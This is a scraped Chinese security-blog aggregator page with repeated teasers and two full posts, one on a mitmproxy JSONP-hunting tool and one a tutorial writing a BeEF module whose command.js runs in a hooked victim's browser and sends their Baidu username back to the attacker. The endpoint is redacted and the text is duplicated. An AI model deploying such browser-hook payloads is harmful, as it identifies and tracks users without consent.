AI与安全「2」:Attack AI(2)破坏模型完整性——逃逸攻击
前言 本文首发于安全客,转载请注明出处。 本文是《AI
Aggregator
Cobalt Strike几种不那么常见的上线方式小记
6 years 7 months ago
手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。
Cobalt Strike几种不那么常见的上线方式小记
6 years 7 months ago
手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。
Cobalt Strike几种不那么常见的上线方式小记
6 years 7 months ago
手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。
Cobalt Strike几种不那么常见的上线方式小记
6 years 7 months ago
手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。
Cobalt Strike几种不那么常见的上线方式小记
6 years 7 months ago
手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。
Cobalt Strike几种不那么常见的上线方式小记
6 years 7 months ago
手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。
AI与安全「2」:Attack AI(1)总述
6 years 7 months ago
本文首发于安全客,转载请注明出处。 本文是《AI与安
AI与安全「2」:Attack AI(1)总述
6 years 7 months ago
本文首发于安全客,转载请注明出处。 本文是《AI与安
The Hunt for IoT: The Opportunity and Impact of Hacked IoT
6 years 7 months ago
We’re still thinking of Internet of Things devices as low risk when reality tells us exactly the opposite.
The Hunt for IoT: The Opportunity and Impact of Hacked IoT
6 years 7 months ago
We’re still thinking of Internet of Things devices as low risk when reality tells us exactly the opposite.
The Hunt for IoT: The Opportunity and Impact of Hacked IoT
6 years 7 months ago
We’re still thinking of Internet of Things devices as low risk when reality tells us exactly the opposite.
Discuz! ML RCE漏洞 getshell 复现 - PaperPen
6 years 7 months ago
Discuz最新漏洞,尚未修复,欢迎各位师傅一起交流
PaperPen
基于mitmproxy的JSONP漏洞辅助挖掘工具
6 years 7 months ago
JSONP漏洞实在是个好东西,但在挖掘的过程中需要耗费大量的时间看Burp来寻找JSONP格式的返回包,因此我实现了基于mitmproxy的漏洞辅助挖掘工具。
这个工具是mitmproxy的一个扩展,启动方法为mitmdump -s ./a.py -q,关于mitmproxy
在启动之后会打开一个本地8080上的HTTP代理,将浏览器的代理设置为http://127.0.0.1:8080并信任证书就可以使用了。该工具在发现了JSONP的HTTP Response之后会将URL和内容显示在终端。
说实话这工具写的很简陋,其实还可以加上什么检测返回结果敏感信息以及去Referer重放的,但我想反正一个站也没几个JSONP页面,不值得。
写完之后想要用这个和Burp的spider配合实现一键挖漏,但发现Burp的Spider实在不够好用,没办法覆盖全,至少我在我挖出洞的那个站点上面测试都没有成功。
运行如图:
链接:https://github.com/TomAPU/Scripts/tree/master/JsonpProxy
这个工具是mitmproxy的一个扩展,启动方法为mitmdump -s ./a.py -q,关于mitmproxy
在启动之后会打开一个本地8080上的HTTP代理,将浏览器的代理设置为http://127.0.0.1:8080并信任证书就可以使用了。该工具在发现了JSONP的HTTP Response之后会将URL和内容显示在终端。
说实话这工具写的很简陋,其实还可以加上什么检测返回结果敏感信息以及去Referer重放的,但我想反正一个站也没几个JSONP页面,不值得。
写完之后想要用这个和Burp的spider配合实现一键挖漏,但发现Burp的Spider实在不够好用,没办法覆盖全,至少我在我挖出洞的那个站点上面测试都没有成功。
运行如图:
链接:https://github.com/TomAPU/Scripts/tree/master/JsonpProxy
DriverTom
失落的十年,写在McAfee二次IPO之前
6 years 7 months ago
上周有媒体报道McAfee计划重新IPO,笔者听到这个消息虽有点感触,却无一点意外,两年前TPG和Thoma
失落的十年,写在McAfee二次IPO之前
6 years 7 months ago
上周有媒体报道McAfee计划重新IPO,笔者听到这个消息虽有点感触,却无一点意外,两年前TPG和Thoma
失落的十年,写在McAfee二次IPO之前
6 years 7 months ago
上周有媒体报道McAfee计划重新IPO,笔者听到这个消息虽有点感触,却无一点意外,两年前TPG和Thoma
将挖掘出的JSONP泄漏漏洞整合进BEEF浏览器利用框架
6 years 7 months ago
0x00 前言
之前在█度上瞎逛的时候开着代理,顺手就找到了█度一个JSONP泄漏漏洞,能够泄漏完整用户名。
不得不说█度的安全真的烂,人家█讯跟它一个年代的,老代码照样很多,但我之前尝试了谷歌上能找到的大部分页面,各种老系统边缘业务都试过了,就只找到一个能泄漏QQ名的漏洞,而█度随便逛逛就能撞到漏洞。建议█度安全部的人自己给自己泼█宝矿泉水自裁谢罪
(本文不会贴出具体的漏洞,如果只是想看█度漏洞的可以退了)
很快,我就构建了个POC能够alert出用户名。我就开始疯狂YY能不能做一个取证溯源系统,挂一个JS就能查到各种信息。
但是我突然隐约记起来,好像有个叫做BEEF的框架已经能将各种欺负浏览器的技巧集成在它的框架里面了,仔细一看这玩意着实厉害,凭我个人无限趋近于零的水平不可能做出更好的来。所以本着不能打败敌人那就加入敌人的无耻精神,我打开BEEF开始研究如何自己写一个BEEF的插件将这个漏洞整合进去
0x01 BEEF插件编写
BEEF官方在他们的gayhub页面上给出了开发模块的方法,不过就只有这一页很多东西根本就没有讲清楚,而且用的还是本人不熟悉的ruby,在编写的时候踩了不少坑
先说下BEEF插件长啥样
BEEF的插件存在/usr/share/beef-xss/modules/exploits/baidu_account/下面的文件夹里面,每个文件夹代表了一个"category",即不同类别的模块,比如社会工程,持久化,漏洞利用,网络拓扑信息搜集之类的。说实在的,这让我联想到了MSF,同样是ruby写的,同样喜欢用文件夹把不同的模块区别开来(还有同样语焉不详的奇妙文档)。
但是不同之处在于,BEEF的每个模块又得装在这个category的子文件夹里面,比如我今天要编写的模块名字叫做baidu_account,归类在Exploits里面。那这个模块的目录就得是/usr/share/beef-xss/modules/exploits/baidu_account/。为什么是目录呢?读者可能已经猜到了,BEEF的每个模块需要多个文件。
一个标准的BEEF模块由三个文件组成
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式,大部分模块的开头都是这个,这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用,我们当然选择true。category选择Exploits,在这里需要注意,category不能乱写,不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块,如果有人直到怎么新建category请告诉我。name就是模块的名字,description就是描述,authors是作者,这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的,target是对应的浏览器,target的格式可以在刚才的链接里面看到我就不详细讲了
写完这个文件之后就要写module.rb了,我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end 在这里我们需要定义一个类,用于后端的处理。类中可以定义三个函数,self.options,pre_send,post_execute。即参数,发送前的准备,发送后的准备。类名虽然没有具体规范,但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数,所以只定义post_execute。
对于BEEF,想要接收受害者上传的参数应该使用@datastore,这个@datastore储存了受害机发上来的数据,至于是怎么发的我们先不用关心,只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存,因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典,用于接收上传的参数的
最后我们需要做的就是写我们的核心command.js了,我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); }); BEEF官方声称我们必须把payload放在beef.execute函数内来执行,但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作,唯一的问题就是他们的迫真文档只列出了名字,功能我们得自己猜。不过我这里蛮幸运的,用Chrome的调试一找就找到了这里的loadScript函数,这样就能用这个函数加载JSONP的接口。在callback函数中,我们需要把辛辛苦苦拿到的数据传回去,这里就要用到beef.net.send函数了
这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西,其中data是个字符串,传输的数据格式跟平时URL传参没啥区别,就是“参数名1=值1&参数名2=值2....”
最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件,你再修改也不会变除非重启BEEF。这个困扰了我很久,之前我一直调试不对,后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范,瞎搞了一会删掉之后WEB端还显示那个模块,那是因为/usr/share/beef-xss/db/beef.db有缓存,需要删掉才能刷新
0x02 展示图片
0x03最后再指点江山几句 最近发现一大堆人都喜欢造什么漏洞利用框架,每个界面都花里胡哨的,仔细一看无非就是调用python脚本去扫描别人统一管理,实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早,比如metasploit就抢占了先机,算是最先搞漏洞利用框架的几个,现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外,还需要能够给模块编写者提供一些支持,帮助模块开发者完成一些重复琐碎的事项,减少模块编写者的工作量,不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架,比如metasploit的shellcode统一管理就很好,从此写二进制EXP的人就能减少很多编shellcode的工作量,进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题,不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考
- config.yaml : 用于描述该模块相关信息的YAML文件
- module.rb :个人理解是我们控制端的“后端”文件,用于
- command.js :发给受害者执行的payload
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式,大部分模块的开头都是这个,这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用,我们当然选择true。category选择Exploits,在这里需要注意,category不能乱写,不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块,如果有人直到怎么新建category请告诉我。name就是模块的名字,description就是描述,authors是作者,这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的,target是对应的浏览器,target的格式可以在刚才的链接里面看到我就不详细讲了
写完这个文件之后就要写module.rb了,我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end 在这里我们需要定义一个类,用于后端的处理。类中可以定义三个函数,self.options,pre_send,post_execute。即参数,发送前的准备,发送后的准备。类名虽然没有具体规范,但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数,所以只定义post_execute。
对于BEEF,想要接收受害者上传的参数应该使用@datastore,这个@datastore储存了受害机发上来的数据,至于是怎么发的我们先不用关心,只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存,因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典,用于接收上传的参数的
最后我们需要做的就是写我们的核心command.js了,我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); }); BEEF官方声称我们必须把payload放在beef.execute函数内来执行,但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作,唯一的问题就是他们的迫真文档只列出了名字,功能我们得自己猜。不过我这里蛮幸运的,用Chrome的调试一找就找到了这里的loadScript函数,这样就能用这个函数加载JSONP的接口。在callback函数中,我们需要把辛辛苦苦拿到的数据传回去,这里就要用到beef.net.send函数了
这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西,其中data是个字符串,传输的数据格式跟平时URL传参没啥区别,就是“参数名1=值1&参数名2=值2....”
最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件,你再修改也不会变除非重启BEEF。这个困扰了我很久,之前我一直调试不对,后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范,瞎搞了一会删掉之后WEB端还显示那个模块,那是因为/usr/share/beef-xss/db/beef.db有缓存,需要删掉才能刷新
0x02 展示图片
0x03最后再指点江山几句 最近发现一大堆人都喜欢造什么漏洞利用框架,每个界面都花里胡哨的,仔细一看无非就是调用python脚本去扫描别人统一管理,实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早,比如metasploit就抢占了先机,算是最先搞漏洞利用框架的几个,现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外,还需要能够给模块编写者提供一些支持,帮助模块开发者完成一些重复琐碎的事项,减少模块编写者的工作量,不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架,比如metasploit的shellcode统一管理就很好,从此写二进制EXP的人就能减少很多编shellcode的工作量,进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题,不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考
DriverTom
WCTF2019 pdoor Review
6 years 7 months ago
brief desc
这里提供官方的题目 https://github.com/paul-axe/ctf
今年 WCTF 还是被按在地上摩擦,就 pdoor 这个题目来说,感觉是相当值得多思考几遍
xmsec
Get Cross-Functional: Learn to Let Go and Embrace DevSecOps
6 years 7 months ago
F5 Labs' Preston Hogue writes for SecurityWeek, explaining how you as a security professional are a source of friction - and therefore risk - and what to do about it.